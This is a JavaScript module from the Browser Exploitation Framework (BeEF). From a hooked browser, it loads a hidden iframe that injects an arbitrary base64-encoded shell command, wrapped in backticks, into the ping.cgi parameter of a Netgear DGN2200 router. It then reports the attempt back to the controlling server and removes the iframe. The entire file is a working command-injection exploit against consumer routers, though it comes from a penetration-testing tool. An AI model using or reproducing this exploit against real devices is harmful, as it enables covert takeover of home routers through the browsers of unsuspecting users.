//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	var rhost = '<%= @rhost %>'; 
	var cmd = '<%= Base64.strict_encode64(@cmd) %>';
	var timeout = 15;

	var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
	
	netgear_dgn2200_iframe_<%= @command_id %>.setAttribute('src',"http://" + rhost + "/ping.cgi?IPAddr1=8&IPAddr2=8&IPAddr3=8&IPAddr4=8&ping=Ping&ess_=" + Math.random().toString(36).substring(2,10) + "&ping_IPAddr=`" + beef.encode.base64.decode(cmd) + "`");

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

    
	cleanup = function() {
		document.body.removeChild(netgear_dgn2200_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

